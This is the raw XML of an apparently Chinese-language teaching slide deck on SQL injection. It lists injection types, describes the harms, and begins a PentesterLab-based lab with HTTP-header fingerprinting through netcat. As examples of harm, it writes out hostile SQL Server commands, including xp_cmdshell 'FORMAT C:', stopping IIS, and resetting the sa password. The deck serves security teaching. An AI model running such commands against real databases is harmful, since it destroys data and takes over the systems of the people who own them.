                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>百科（中文版） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32561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9183" y="0"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722705" y="1109282"/>
            <a:ext cx="10363826" cy="4825388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Classic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQLI —— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>典型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本注入式的攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意用户输入用来影响被执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind or Inference SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>injection —— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>推理注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Database management system-specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQLI ——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库管理系统的特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Compounded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQLI ——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>复合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>injection + insufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—— SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不充分认证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>injection + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> attacks —— SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>injection + DNS hijacking ——  SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>injection + XSS —— SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>+XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722705" y="5934670"/>
            <a:ext cx="5184433" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>来源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> [WIKIPEDIA SQL injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	https://en.wikipedia.org/wiki/SQL_injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39933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63675"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>注入 危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009309" y="1665027"/>
            <a:ext cx="10905186" cy="4713026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据表中的数据外泄，例如个人机密数据，账户数据，密码等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据结构被黑客探知，得以做进一步攻击（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sys.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库服务器被攻击，系统管理员账户被窜改（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALTER LOGIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> WITH PASSWORD='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取系统较高权限后，有可能得以在网页加入恶意链接、恶意代码以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> "net stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iisadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可停止服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏硬盘数据，瘫痪全系统（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> "FORMAT C:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301416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11" y="2037884"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>实验举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661313" y="4016198"/>
            <a:ext cx="8378960" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>实验过程参考自：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pentesterlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> course]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>://pentesterlab.com/exercises/from_sqli_to_shell/course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303088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53" y="309604"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2596831"/>
            <a:ext cx="9622297" cy="4053904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2066640"/>
            <a:ext cx="8634095" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指纹识别可以使用多个工具。通过使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器，检测该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写的可能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912820" y="3499726"/>
            <a:ext cx="3410762" cy="580954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
